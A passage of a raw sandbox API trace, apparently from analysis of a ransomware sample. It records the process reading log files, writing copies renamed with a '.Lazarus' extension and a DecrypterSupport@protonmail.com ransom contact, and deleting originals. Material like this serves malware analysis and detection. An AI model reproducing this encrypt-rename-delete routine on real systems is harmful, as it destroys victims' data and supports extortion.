(hFile=0x424) returned 0x1 [0059.633] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0059.633] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8b218 [0059.633] GetLastError () returned 0xb7 [0059.633] SetLastError (dwErrCode=0xb7) [0059.633] WriteFile (in: hFile=0x424, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0059.634] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b218 | out: hHeap=0x20000) returned 1 [0059.634] CloseHandle (hObject=0x424) returned 1 [0059.665] AreFileApisANSI () returned 1 [0059.665] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x535b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0059.665] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x69bb0 [0059.666] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x535b0, cbMultiByte=-1, lpWideCharStr=0x69bb0, cchWideChar=58 | out: lpWideCharStr="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log") returned 58 [0059.666] DeleteFileW (lpFileName="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log" (normalized: "c:\\$getcurrent\\logs\\downlevel_2017_09_07_02_02_39_766.log")) returned 1 [0059.719] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0059.719] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0059.719] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0059.719] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0059.719] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0059.721] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0059.721] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0059.721] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5e570 | out: hHeap=0x20000) returned 1 [0059.721] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d660 | out: hHeap=0x20000) returned 1 [0059.721] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d4c8 | out: hHeap=0x20000) returned 1 [0059.721] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0059.721] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30fc0 | out: hHeap=0x20000) returned 1 [0059.721] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x535b0 | out: hHeap=0x20000) returned 1 [0059.725] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0059.725] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0059.725] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0059.726] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0059.726] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0059.726] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.726] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.726] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x973abb0f, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x980eecb6, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1774, dwReserved0=0x23, dwReserved1=0x0, cFileName="oobe_2017_09_07_03_08_57_737.log", cAlternateFileName="OOBE_2~1.LOG")) returned 1 [0059.726] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0059.726] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e500 [0059.726] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0059.726] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68b80 [0059.726] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e500 | out: hHeap=0x20000) returned 1 [0059.726] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d580 [0059.730] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0059.730] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d000 [0059.730] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0059.731] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d580 | out: hHeap=0x20000) returned 1 [0059.731] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68b80 | out: hHeap=0x20000) returned 1 [0059.731] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d000 | out: hHeap=0x20000) returned 1 [0059.731] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0059.731] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0059.731] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0059.731] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0059.731] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d040 [0059.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0059.732] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0059.732] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0059.734] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cfa8 [0059.734] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e500 [0059.734] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0059.734] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0059.734] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e500 | out: hHeap=0x20000) returned 1 [0059.734] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0059.734] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0059.734] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0059.735] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.735] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.735] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.735] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.735] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0059.735] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cfa8 | out: hHeap=0x20000) returned 1 [0059.747] AreFileApisANSI () returned 1 [0059.747] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log", lpUsedDefaultChar=0x0) returned 53 [0059.747] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0059.747] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.747] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.747] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0059.748] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0059.751] AreFileApisANSI () returned 1 [0059.751] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0059.751] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75f30 [0059.751] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x75f30, cchWideChar=53 | out: lpWideCharStr="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log") returned 53 [0059.751] CreateFileW (lpFileName="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log" (normalized: "c:\\$getcurrent\\logs\\oobe_2017_09_07_03_08_57_737.log"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0059.752] GetFileType (hFile=0x424) returned 0x1 [0059.760] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0059.760] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0059.760] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0059.760] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0059.761] CloseHandle (hObject=0x424) returned 1 [0059.761] AreFileApisANSI () returned 1 [0059.761] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0059.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75b70 [0059.761] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x75b70, cchWideChar=53 | out: lpWideCharStr="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log") returned 53 [0059.761] CreateFileW (lpFileName="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log" (normalized: "c:\\$getcurrent\\logs\\oobe_2017_09_07_03_08_57_737.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0059.761] GetFileType (hFile=0x424) returned 0x1 [0059.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0059.761] CloseHandle (hObject=0x424) returned 1 [0059.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0059.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0059.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0059.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0059.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0059.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0059.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0059.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0059.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d268 [0059.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0059.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0059.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0059.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0059.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0059.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d268 | out: hHeap=0x20000) returned 1 [0059.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0059.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0059.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cfa8 [0059.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd40 [0059.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d738 [0059.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0059.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cfa8 | out: hHeap=0x20000) returned 1 [0059.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0059.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd98 [0059.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d738 | out: hHeap=0x20000) returned 1 [0059.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d528 [0059.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd98 | out: hHeap=0x20000) returned 1 [0059.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d528 | out: hHeap=0x20000) returned 1 [0059.762] AreFileApisANSI () returned 1 [0059.762] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0059.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x76278 [0059.762] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x76278, cchWideChar=53 | out: lpWideCharStr="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log") returned 53 [0059.762] GetFileAttributesExW (in: lpFileName="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log" (normalized: "c:\\$getcurrent\\logs\\oobe_2017_09_07_03_08_57_737.log"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x973abb0f, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x980eecb6, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1774)) returned 1 [0059.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0059.762] AreFileApisANSI () returned 1 [0059.762] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0059.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0059.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0059.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0059.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0059.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0059.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0059.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0059.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0059.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0059.762] GetLastError () returned 0x0 [0059.763] SetLastError (dwErrCode=0x0) [0059.763] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e500 [0059.763] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x85fc0 [0059.763] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x30fc0 [0059.763] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d540 [0059.763] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d648 [0059.763] GetLastError () returned 0x0 [0059.763] SetLastError (dwErrCode=0x0) [0059.763] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e500 | out: hHeap=0x20000) returned 1 [0059.763] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0059.763] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5f) returned 0x71688 [0059.763] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0059.763] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x5e570 [0059.763] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0059.763] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0059.763] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0059.763] AreFileApisANSI () returned 1 [0059.763] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 115 [0059.763] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe6) returned 0x5a6b8 [0059.763] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x5a6b8, cchWideChar=115 | out: lpWideCharStr="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 115 [0059.763] CreateFileW (lpFileName="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\$getcurrent\\logs\\oobe_2017_09_07_03_08_57_737.log.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0059.769] GetFileType (hFile=0x424) returned 0x1 [0059.769] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0059.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfb0 [0059.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0059.769] AreFileApisANSI () returned 1 [0059.769] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0059.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75f30 [0059.769] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x75f30, cchWideChar=53 | out: lpWideCharStr="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log") returned 53 [0059.770] CreateFileW (lpFileName="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log" (normalized: "c:\\$getcurrent\\logs\\oobe_2017_09_07_03_08_57_737.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0059.770] GetFileType (hFile=0x420) returned 0x1 [0059.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0059.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a4b0 [0059.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0059.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0059.770] GetLastError () returned 0x0 [0059.770] SetLastError (dwErrCode=0x0) [0059.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0059.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0059.770] GetLastError () returned 0x0 [0059.770] SetLastError (dwErrCode=0x0) [0059.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0059.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0059.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8b218 [0059.770] ReadFile (in: hFile=0x420, lpBuffer=0x8b218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8b218*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0059.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0059.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d588 [0059.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c220 [0059.773] GetLastError () returned 0x0 [0059.773] SetLastError (dwErrCode=0x0) [0059.773] GetLastError () returned 0x0 [0059.773] SetLastError (dwErrCode=0x0) [0059.773] GetLastError () returned 0x0 [0059.773] SetLastError (dwErrCode=0x0) [0059.773] GetLastError () returned 0x0 [0059.773] SetLastError (dwErrCode=0x0) [0059.773] ReadFile (in: hFile=0x420, lpBuffer=0x8b218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8b218*, lpNumberOfBytesRead=0x327f0c4*=0x774, lpOverlapped=0x0) returned 1 [0059.774] WriteFile (in: hFile=0x424, lpBuffer=0x8c220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0059.775] GetLastError () returned 0x0 [0059.775] SetLastError (dwErrCode=0x0) [0059.775] ReadFile (in: hFile=0x420, lpBuffer=0x8b218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8b218*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0059.775] GetLastError () returned 0x0 [0059.775] SetLastError (dwErrCode=0x0) [0059.776] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0059.776] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d5a0 [0059.776] GetLastError () returned 0x0 [0059.776] SetLastError (dwErrCode=0x0) [0059.776] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d588 | out: hHeap=0x20000) returned 1 [0059.776] WriteFile (in: hFile=0x424, lpBuffer=0x8c220*, nNumberOfBytesToWrite=0x780, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x8c220*, lpNumberOfBytesWritten=0x327ef70*=0x780, lpOverlapped=0x0) returned 1 [0059.776] GetLastError () returned 0x0 [0059.776] SetLastError (dwErrCode=0x0) [0059.776] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0059.776] GetLastError () returned 0x0 [0059.776] SetLastError (dwErrCode=0x0) [0059.776] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0059.776] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0059.776] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d5a0 | out: hHeap=0x20000) returned 1 [0059.776] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0059.776] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a4b0 | out: hHeap=0x20000) returned 1 [0059.777] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c220 | out: hHeap=0x20000) returned 1 [0059.777] CloseHandle (hObject=0x424) returned 1 [0059.778] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b218 | out: hHeap=0x20000) returned 1 [0059.778] CloseHandle (hObject=0x420) returned 1 [0059.778] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0059.778] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d040 [0059.778] AreFileApisANSI () returned 1 [0059.778] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0059.778] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75cd8 [0059.778] 